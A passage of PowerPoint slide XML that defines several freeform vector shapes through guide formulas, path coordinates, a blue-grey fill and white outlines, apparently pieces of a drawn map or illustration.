              <a:lstStyle/>
              <a:p>
                <a:endParaRPr lang="en-US"/>
              </a:p>
            </p:txBody>
          </p:sp>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="36452" name="Freeform 184"/>
              <p:cNvSpPr>
                <a:spLocks/>
              </p:cNvSpPr>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="2738" y="2767"/>
                <a:ext cx="29" cy="80"/>
              </a:xfrm>
              <a:custGeom>
                <a:avLst/>
                <a:gdLst>
                  <a:gd name="T0" fmla="*/ 2 w 29"/>
                  <a:gd name="T1" fmla="*/ 0 h 80"/>
                  <a:gd name="T2" fmla="*/ 9 w 29"/>
                  <a:gd name="T3" fmla="*/ 1 h 80"/>
                  <a:gd name="T4" fmla="*/ 14 w 29"/>
                  <a:gd name="T5" fmla="*/ 3 h 80"/>
                  <a:gd name="T6" fmla="*/ 16 w 29"/>
                  <a:gd name="T7" fmla="*/ 3 h 80"/>
                  <a:gd name="T8" fmla="*/ 16 w 29"/>
                  <a:gd name="T9" fmla="*/ 6 h 80"/>
                  <a:gd name="T10" fmla="*/ 15 w 29"/>
                  <a:gd name="T11" fmla="*/ 10 h 80"/>
                  <a:gd name="T12" fmla="*/ 16 w 29"/>
                  <a:gd name="T13" fmla="*/ 13 h 80"/>
                  <a:gd name="T14" fmla="*/ 19 w 29"/>
                  <a:gd name="T15" fmla="*/ 15 h 80"/>
                  <a:gd name="T16" fmla="*/ 22 w 29"/>
                  <a:gd name="T17" fmla="*/ 18 h 80"/>
                  <a:gd name="T18" fmla="*/ 23 w 29"/>
                  <a:gd name="T19" fmla="*/ 23 h 80"/>
                  <a:gd name="T20" fmla="*/ 26 w 29"/>
                  <a:gd name="T21" fmla="*/ 32 h 80"/>
                  <a:gd name="T22" fmla="*/ 26 w 29"/>
                  <a:gd name="T23" fmla="*/ 36 h 80"/>
                  <a:gd name="T24" fmla="*/ 27 w 29"/>
                  <a:gd name="T25" fmla="*/ 40 h 80"/>
                  <a:gd name="T26" fmla="*/ 27 w 29"/>
                  <a:gd name="T27" fmla="*/ 46 h 80"/>
                  <a:gd name="T28" fmla="*/ 28 w 29"/>
                  <a:gd name="T29" fmla="*/ 53 h 80"/>
                  <a:gd name="T30" fmla="*/ 28 w 29"/>
                  <a:gd name="T31" fmla="*/ 57 h 80"/>
                  <a:gd name="T32" fmla="*/ 28 w 29"/>
                  <a:gd name="T33" fmla="*/ 63 h 80"/>
                  <a:gd name="T34" fmla="*/ 26 w 29"/>
                  <a:gd name="T35" fmla="*/ 68 h 80"/>
                  <a:gd name="T36" fmla="*/ 28 w 29"/>
                  <a:gd name="T37" fmla="*/ 76 h 80"/>
                  <a:gd name="T38" fmla="*/ 29 w 29"/>
                  <a:gd name="T39" fmla="*/ 77 h 80"/>
                  <a:gd name="T40" fmla="*/ 26 w 29"/>
                  <a:gd name="T41" fmla="*/ 78 h 80"/>
                  <a:gd name="T42" fmla="*/ 22 w 29"/>
                  <a:gd name="T43" fmla="*/ 79 h 80"/>
                  <a:gd name="T44" fmla="*/ 20 w 29"/>
                  <a:gd name="T45" fmla="*/ 80 h 80"/>
                  <a:gd name="T46" fmla="*/ 20 w 29"/>
                  <a:gd name="T47" fmla="*/ 80 h 80"/>
                  <a:gd name="T48" fmla="*/ 14 w 29"/>
                  <a:gd name="T49" fmla="*/ 76 h 80"/>
                  <a:gd name="T50" fmla="*/ 11 w 29"/>
                  <a:gd name="T51" fmla="*/ 72 h 80"/>
                  <a:gd name="T52" fmla="*/ 10 w 29"/>
                  <a:gd name="T53" fmla="*/ 68 h 80"/>
                  <a:gd name="T54" fmla="*/ 10 w 29"/>
                  <a:gd name="T55" fmla="*/ 64 h 80"/>
                  <a:gd name="T56" fmla="*/ 10 w 29"/>
                  <a:gd name="T57" fmla="*/ 59 h 80"/>
                  <a:gd name="T58" fmla="*/ 10 w 29"/>
                  <a:gd name="T59" fmla="*/ 50 h 80"/>
                  <a:gd name="T60" fmla="*/ 11 w 29"/>
                  <a:gd name="T61" fmla="*/ 47 h 80"/>
                  <a:gd name="T62" fmla="*/ 13 w 29"/>
                  <a:gd name="T63" fmla="*/ 45 h 80"/>
                  <a:gd name="T64" fmla="*/ 13 w 29"/>
                  <a:gd name="T65" fmla="*/ 44 h 80"/>
                  <a:gd name="T66" fmla="*/ 9 w 29"/>
                  <a:gd name="T67" fmla="*/ 39 h 80"/>
                  <a:gd name="T68" fmla="*/ 8 w 29"/>
                  <a:gd name="T69" fmla="*/ 34 h 80"/>
                  <a:gd name="T70" fmla="*/ 6 w 29"/>
                  <a:gd name="T71" fmla="*/ 26 h 80"/>
                  <a:gd name="T72" fmla="*/ 6 w 29"/>
                  <a:gd name="T73" fmla="*/ 23 h 80"/>
                  <a:gd name="T74" fmla="*/ 7 w 29"/>
                  <a:gd name="T75" fmla="*/ 18 h 80"/>
                  <a:gd name="T76" fmla="*/ 5 w 29"/>
                  <a:gd name="T77" fmla="*/ 15 h 80"/>
                  <a:gd name="T78" fmla="*/ 0 w 29"/>
                  <a:gd name="T79" fmla="*/ 8 h 80"/>
                  <a:gd name="T80" fmla="*/ 0 w 29"/>
                  <a:gd name="T81" fmla="*/ 6 h 80"/>
                  <a:gd name="T82" fmla="*/ 2 w 29"/>
                  <a:gd name="T83" fmla="*/ 0 h 8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29"/>
                  <a:gd name="T127" fmla="*/ 0 h 80"/>
                  <a:gd name="T128" fmla="*/ 29 w 29"/>
                  <a:gd name="T129" fmla="*/ 80 h 80"/>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29" h="80">
                    <a:moveTo>
                      <a:pt x="2" y="0"/>
                    </a:moveTo>
                    <a:lnTo>
                      <a:pt x="9" y="1"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="14" y="3"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="16" y="3"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="16" y="6"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="15" y="10"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="16" y="13"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="19" y="15"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="22" y="18"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="23" y="23"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="26" y="32"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="26" y="36"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="27" y="40"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="27" y="46"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="28" y="53"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="28" y="57"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="28" y="63"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="26" y="68"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="28" y="76"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="29" y="77"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="26" y="78"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="22" y="79"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="20" y="80"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="14" y="76"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="11" y="72"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="10" y="68"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="10" y="64"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="10" y="59"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="10" y="50"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="11" y="47"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="13" y="45"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="13" y="44"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="9" y="39"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="8" y="34"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="6" y="26"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="6" y="23"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="7" y="18"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="5" y="15"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="0" y="8"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="0" y="6"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="2" y="0"/>
                    </a:lnTo>
                    <a:close/>
                  </a:path>
                </a:pathLst>
              </a:custGeom>
              <a:solidFill>
                <a:srgbClr val="96AFCF"/>
              </a:solidFill>
              <a:ln w="9525">
                <a:noFill/>
                <a:round/>
                <a:headEnd/>
                <a:tailEnd/>
              </a:ln>
            </p:spPr>
            <p:txBody>
              <a:bodyPr/>
              <a:lstStyle/>
              <a:p>
                <a:endParaRPr lang="en-US"/>
              </a:p>
            </p:txBody>
          </p:sp>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="36453" name="Freeform 185"/>
              <p:cNvSpPr>
                <a:spLocks/>
              </p:cNvSpPr>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="2738" y="2767"/>
                <a:ext cx="29" cy="80"/>
              </a:xfrm>
              <a:custGeom>
                <a:avLst/>
                <a:gdLst>
                  <a:gd name="T0" fmla="*/ 2 w 29"/>
                  <a:gd name="T1" fmla="*/ 0 h 80"/>
                  <a:gd name="T2" fmla="*/ 9 w 29"/>
                  <a:gd name="T3" fmla="*/ 1 h 80"/>
                  <a:gd name="T4" fmla="*/ 14 w 29"/>
                  <a:gd name="T5" fmla="*/ 3 h 80"/>
                  <a:gd name="T6" fmla="*/ 16 w 29"/>
                  <a:gd name="T7" fmla="*/ 3 h 80"/>
                  <a:gd name="T8" fmla="*/ 16 w 29"/>
                  <a:gd name="T9" fmla="*/ 6 h 80"/>
                  <a:gd name="T10" fmla="*/ 15 w 29"/>
                  <a:gd name="T11" fmla="*/ 10 h 80"/>
                  <a:gd name="T12" fmla="*/ 16 w 29"/>
                  <a:gd name="T13" fmla="*/ 13 h 80"/>
                  <a:gd name="T14" fmla="*/ 19 w 29"/>
                  <a:gd name="T15" fmla="*/ 15 h 80"/>
                  <a:gd name="T16" fmla="*/ 22 w 29"/>
                  <a:gd name="T17" fmla="*/ 18 h 80"/>
                  <a:gd name="T18" fmla="*/ 23 w 29"/>
                  <a:gd name="T19" fmla="*/ 23 h 80"/>
                  <a:gd name="T20" fmla="*/ 26 w 29"/>
                  <a:gd name="T21" fmla="*/ 32 h 80"/>
                  <a:gd name="T22" fmla="*/ 26 w 29"/>
                  <a:gd name="T23" fmla="*/ 36 h 80"/>
                  <a:gd name="T24" fmla="*/ 27 w 29"/>
                  <a:gd name="T25" fmla="*/ 40 h 80"/>
                  <a:gd name="T26" fmla="*/ 27 w 29"/>
                  <a:gd name="T27" fmla="*/ 46 h 80"/>
                  <a:gd name="T28" fmla="*/ 28 w 29"/>
                  <a:gd name="T29" fmla="*/ 53 h 80"/>
                  <a:gd name="T30" fmla="*/ 28 w 29"/>
                  <a:gd name="T31" fmla="*/ 57 h 80"/>
                  <a:gd name="T32" fmla="*/ 28 w 29"/>
                  <a:gd name="T33" fmla="*/ 63 h 80"/>
                  <a:gd name="T34" fmla="*/ 26 w 29"/>
                  <a:gd name="T35" fmla="*/ 68 h 80"/>
                  <a:gd name="T36" fmla="*/ 28 w 29"/>
                  <a:gd name="T37" fmla="*/ 76 h 80"/>
                  <a:gd name="T38" fmla="*/ 29 w 29"/>
                  <a:gd name="T39" fmla="*/ 77 h 80"/>
                  <a:gd name="T40" fmla="*/ 26 w 29"/>
                  <a:gd name="T41" fmla="*/ 78 h 80"/>
                  <a:gd name="T42" fmla="*/ 22 w 29"/>
                  <a:gd name="T43" fmla="*/ 79 h 80"/>
                  <a:gd name="T44" fmla="*/ 20 w 29"/>
                  <a:gd name="T45" fmla="*/ 80 h 80"/>
                  <a:gd name="T46" fmla="*/ 20 w 29"/>
                  <a:gd name="T47" fmla="*/ 80 h 80"/>
                  <a:gd name="T48" fmla="*/ 14 w 29"/>
                  <a:gd name="T49" fmla="*/ 76 h 80"/>
                  <a:gd name="T50" fmla="*/ 11 w 29"/>
                  <a:gd name="T51" fmla="*/ 72 h 80"/>
                  <a:gd name="T52" fmla="*/ 10 w 29"/>
                  <a:gd name="T53" fmla="*/ 68 h 80"/>
                  <a:gd name="T54" fmla="*/ 10 w 29"/>
                  <a:gd name="T55" fmla="*/ 64 h 80"/>
                  <a:gd name="T56" fmla="*/ 10 w 29"/>
                  <a:gd name="T57" fmla="*/ 59 h 80"/>
                  <a:gd name="T58" fmla="*/ 10 w 29"/>
                  <a:gd name="T59" fmla="*/ 50 h 80"/>
                  <a:gd name="T60" fmla="*/ 11 w 29"/>
                  <a:gd name="T61" fmla="*/ 47 h 80"/>
                  <a:gd name="T62" fmla="*/ 13 w 29"/>
                  <a:gd name="T63" fmla="*/ 45 h 80"/>
                  <a:gd name="T64" fmla="*/ 13 w 29"/>
                  <a:gd name="T65" fmla="*/ 44 h 80"/>
                  <a:gd name="T66" fmla="*/ 9 w 29"/>
                  <a:gd name="T67" fmla="*/ 39 h 80"/>
                  <a:gd name="T68" fmla="*/ 8 w 29"/>
                  <a:gd name="T69" fmla="*/ 34 h 80"/>
                  <a:gd name="T70" fmla="*/ 6 w 29"/>
                  <a:gd name="T71" fmla="*/ 26 h 80"/>
                  <a:gd name="T72" fmla="*/ 6 w 29"/>
                  <a:gd name="T73" fmla="*/ 23 h 80"/>
                  <a:gd name="T74" fmla="*/ 7 w 29"/>
                  <a:gd name="T75" fmla="*/ 18 h 80"/>
                  <a:gd name="T76" fmla="*/ 5 w 29"/>
                  <a:gd name="T77" fmla="*/ 15 h 80"/>
                  <a:gd name="T78" fmla="*/ 0 w 29"/>
                  <a:gd name="T79" fmla="*/ 8 h 80"/>
                  <a:gd name="T80" fmla="*/ 0 w 29"/>
                  <a:gd name="T81" fmla="*/ 6 h 80"/>
                  <a:gd name="T82" fmla="*/ 2 w 29"/>
                  <a:gd name="T83" fmla="*/ 0 h 8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29"/>
                  <a:gd name="T127" fmla="*/ 0 h 80"/>
                  <a:gd name="T128" fmla="*/ 29 w 29"/>
                  <a:gd name="T129" fmla="*/ 80 h 80"/>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29" h="80">
                    <a:moveTo>
                      <a:pt x="2" y="0"/>
                    </a:moveTo>
                    <a:lnTo>
                      <a:pt x="9" y="1"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="14" y="3"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="16" y="3"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="16" y="6"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="15" y="10"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="16" y="13"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="19" y="15"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="22" y="18"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="23" y="23"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="26" y="32"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="26" y="36"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="27" y="40"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="27" y="46"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="28" y="53"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="28" y="57"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="28" y="63"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="26" y="68"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="28" y="76"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="29" y="77"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="26" y="78"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="22" y="79"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="20" y="80"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="14" y="76"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="11" y="72"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="10" y="68"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="10" y="64"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="10" y="59"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="10" y="50"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="11" y="47"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="13" y="45"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="13" y="44"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="9" y="39"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="8" y="34"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="6" y="26"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="6" y="23"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="7" y="18"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="5" y="15"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="0" y="8"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="0" y="6"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="2" y="0"/>
                    </a:lnTo>
                    <a:close/>
                  </a:path>
                </a:pathLst>
              </a:custGeom>
              <a:noFill/>
              <a:ln w="2" cap="rnd">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:round/>
                <a:headEnd/>
                <a:tailEnd/>
              </a:ln>
            </p:spPr>
            <p:txBody>
              <a:bodyPr/>
              <a:lstStyle/>
              <a:p>
                <a:endParaRPr lang="en-US"/>
              </a:p>
            </p:txBody>
          </p:sp>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="36454" name="Freeform 186"/>
              <p:cNvSpPr>
                <a:spLocks/>
              </p:cNvSpPr>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="2688" y="2766"/>
                <a:ext cx="70" cy="103"/>
              </a:xfrm>
              <a:custGeom>
                <a:avLst/>
                <a:gdLst>
                  <a:gd name="T0" fmla="*/ 6 w 70"/>
                  <a:gd name="T1" fmla="*/ 25 h 103"/>
                  <a:gd name="T2" fmla="*/ 7 w 70"/>
                  <a:gd name="T3" fmla="*/ 24 h 103"/>
                  <a:gd name="T4" fmla="*/ 7 w 70"/>
                  <a:gd name="T5" fmla="*/ 21 h 103"/>
                  <a:gd name="T6" fmla="*/ 5 w 70"/>
                  <a:gd name="T7" fmla="*/ 7 h 103"/>
                  <a:gd name="T8" fmla="*/ 6 w 70"/>
                  <a:gd name="T9" fmla="*/ 5 h 103"/>
                  <a:gd name="T10" fmla="*/ 8 w 70"/>
                  <a:gd name="T11" fmla="*/ 3 h 103"/>
                  <a:gd name="T12" fmla="*/ 23 w 70"/>
                  <a:gd name="T13" fmla="*/ 3 h 103"/>
                  <a:gd name="T14" fmla="*/ 29 w 70"/>
                  <a:gd name="T15" fmla="*/ 3 h 103"/>
                  <a:gd name="T16" fmla="*/ 40 w 70"/>
                  <a:gd name="T17" fmla="*/ 3 h 103"/>
                  <a:gd name="T18" fmla="*/ 47 w 70"/>
                  <a:gd name="T19" fmla="*/ 0 h 103"/>
                  <a:gd name="T20" fmla="*/ 48 w 70"/>
                  <a:gd name="T21" fmla="*/ 0 h 103"/>
                  <a:gd name="T22" fmla="*/ 52 w 70"/>
                  <a:gd name="T23" fmla="*/ 1 h 103"/>
                  <a:gd name="T24" fmla="*/ 50 w 70"/>
                  <a:gd name="T25" fmla="*/ 7 h 103"/>
                  <a:gd name="T26" fmla="*/ 50 w 70"/>
                  <a:gd name="T27" fmla="*/ 9 h 103"/>
                  <a:gd name="T28" fmla="*/ 55 w 70"/>
                  <a:gd name="T29" fmla="*/ 16 h 103"/>
                  <a:gd name="T30" fmla="*/ 57 w 70"/>
                  <a:gd name="T31" fmla="*/ 19 h 103"/>
                  <a:gd name="T32" fmla="*/ 56 w 70"/>
                  <a:gd name="T33" fmla="*/ 24 h 103"/>
                  <a:gd name="T34" fmla="*/ 56 w 70"/>
                  <a:gd name="T35" fmla="*/ 27 h 103"/>
                  <a:gd name="T36" fmla="*/ 58 w 70"/>
                  <a:gd name="T37" fmla="*/ 35 h 103"/>
                  <a:gd name="T38" fmla="*/ 59 w 70"/>
                  <a:gd name="T39" fmla="*/ 40 h 103"/>
                  <a:gd name="T40" fmla="*/ 63 w 70"/>
                  <a:gd name="T41" fmla="*/ 45 h 103"/>
                  <a:gd name="T42" fmla="*/ 63 w 70"/>
                  <a:gd name="T43" fmla="*/ 46 h 103"/>
                  <a:gd name="T44" fmla="*/ 61 w 70"/>
                  <a:gd name="T45" fmla="*/ 48 h 103"/>
                  <a:gd name="T46" fmla="*/ 60 w 70"/>
                  <a:gd name="T47" fmla="*/ 51 h 103"/>
                  <a:gd name="T48" fmla="*/ 60 w 70"/>
                  <a:gd name="T49" fmla="*/ 60 h 103"/>
                  <a:gd name="T50" fmla="*/ 60 w 70"/>
                  <a:gd name="T51" fmla="*/ 65 h 103"/>
                  <a:gd name="T52" fmla="*/ 60 w 70"/>
                  <a:gd name="T53" fmla="*/ 69 h 103"/>
                  <a:gd name="T54" fmla="*/ 61 w 70"/>
                  <a:gd name="T55" fmla="*/ 73 h 103"/>
                  <a:gd name="T56" fmla="*/ 64 w 70"/>
                  <a:gd name="T57" fmla="*/ 77 h 103"/>
                  <a:gd name="T58" fmla="*/ 70 w 70"/>
                  <a:gd name="T59" fmla="*/ 81 h 103"/>
                  <a:gd name="T60" fmla="*/ 66 w 70"/>
                  <a:gd name="T61" fmla="*/ 86 h 103"/>
                  <a:gd name="T62" fmla="*/ 64 w 70"/>
                  <a:gd name="T63" fmla="*/ 87 h 103"/>
                  <a:gd name="T64" fmla="*/ 60 w 70"/>
                  <a:gd name="T65" fmla="*/ 87 h 103"/>
                  <a:gd name="T66" fmla="*/ 52 w 70"/>
                  <a:gd name="T67" fmla="*/ 88 h 103"/>
                  <a:gd name="T68" fmla="*/ 49 w 70"/>
                  <a:gd name="T69" fmla="*/ 89 h 103"/>
                  <a:gd name="T70" fmla="*/ 48 w 70"/>
                  <a:gd name="T71" fmla="*/ 90 h 103"/>
                  <a:gd name="T72" fmla="*/ 41 w 70"/>
                  <a:gd name="T73" fmla="*/ 93 h 103"/>
                  <a:gd name="T74" fmla="*/ 32 w 70"/>
                  <a:gd name="T75" fmla="*/ 96 h 103"/>
                  <a:gd name="T76" fmla="*/ 26 w 70"/>
                  <a:gd name="T77" fmla="*/ 99 h 103"/>
                  <a:gd name="T78" fmla="*/ 19 w 70"/>
                  <a:gd name="T79" fmla="*/ 103 h 103"/>
                  <a:gd name="T80" fmla="*/ 15 w 70"/>
                  <a:gd name="T81" fmla="*/ 101 h 103"/>
                  <a:gd name="T82" fmla="*/ 8 w 70"/>
                  <a:gd name="T83" fmla="*/ 98 h 103"/>
                  <a:gd name="T84" fmla="*/ 7 w 70"/>
                  <a:gd name="T85" fmla="*/ 97 h 103"/>
                  <a:gd name="T86" fmla="*/ 7 w 70"/>
                  <a:gd name="T87" fmla="*/ 91 h 103"/>
                  <a:gd name="T88" fmla="*/ 3 w 70"/>
                  <a:gd name="T89" fmla="*/ 83 h 103"/>
                  <a:gd name="T90" fmla="*/ 1 w 70"/>
                  <a:gd name="T91" fmla="*/ 78 h 103"/>
                  <a:gd name="T92" fmla="*/ 0 w 70"/>
                  <a:gd name="T93" fmla="*/ 73 h 103"/>
                  <a:gd name="T94" fmla="*/ 3 w 70"/>
                  <a:gd name="T95" fmla="*/ 66 h 103"/>
                  <a:gd name="T96" fmla="*/ 6 w 70"/>
                  <a:gd name="T97" fmla="*/ 56 h 103"/>
                  <a:gd name="T98" fmla="*/ 9 w 70"/>
                  <a:gd name="T99" fmla="*/ 50 h 103"/>
                  <a:gd name="T100" fmla="*/ 11 w 70"/>
                  <a:gd name="T101" fmla="*/ 46 h 103"/>
                  <a:gd name="T102" fmla="*/ 9 w 70"/>
                  <a:gd name="T103" fmla="*/ 36 h 103"/>
                  <a:gd name="T104" fmla="*/ 7 w 70"/>
                  <a:gd name="T105" fmla="*/ 26 h 103"/>
                  <a:gd name="T106" fmla="*/ 6 w 70"/>
                  <a:gd name="T107" fmla="*/ 25 h 103"/>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70"/>
                  <a:gd name="T163" fmla="*/ 0 h 103"/>
                  <a:gd name="T164" fmla="*/ 70 w 70"/>
                  <a:gd name="T165" fmla="*/ 103 h 103"/>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70" h="103">
                    <a:moveTo>
                      <a:pt x="6" y="25"/>
                    </a:moveTo>
                    <a:lnTo>
                      <a:pt x="7" y="24"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="7" y="21"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="5" y="7"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="6" y="5"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="8" y="3"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="23" y="3"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="29" y="3"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="40" y="3"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="47" y="0"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="48" y="0"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="52" y="1"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="50" y="7"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="50" y="9"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="55" y="16"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="57" y="19"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="56" y="24"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="56" y="27"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="58" y="35"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="59" y="40"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="63" y="45"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="63" y="46"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="61" y="48"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="60" y="51"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="60" y="60"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="60" y="65"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="60" y="69"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="61" y="73"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="64" y="77"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="70" y="81"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="66" y="86"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="64" y="87"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="60" y="87"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="52" y="88"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="49" y="89"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="48" y="90"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="41" y="93"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="32" y="96"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="26" y="99"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="19" y="103"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="15" y="101"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="8" y="98"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="7" y="97"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="7" y="91"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="3" y="83"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1" y="78"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="0" y="73"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="3" y="66"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="6" y="56"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="9" y="50"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="11" y="46"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="9" y="36"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="7" y="26"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="6" y="25"/>
                    </a:lnTo>
                    <a:close/>
                  </a:path>
                </a:pathLst>
              </a:custGeom>
              <a:solidFill>
                <a:srgbClr val="96AFCF"/>
              </a:solidFill>
              <a:ln w="9525">
                <a:noFill/>
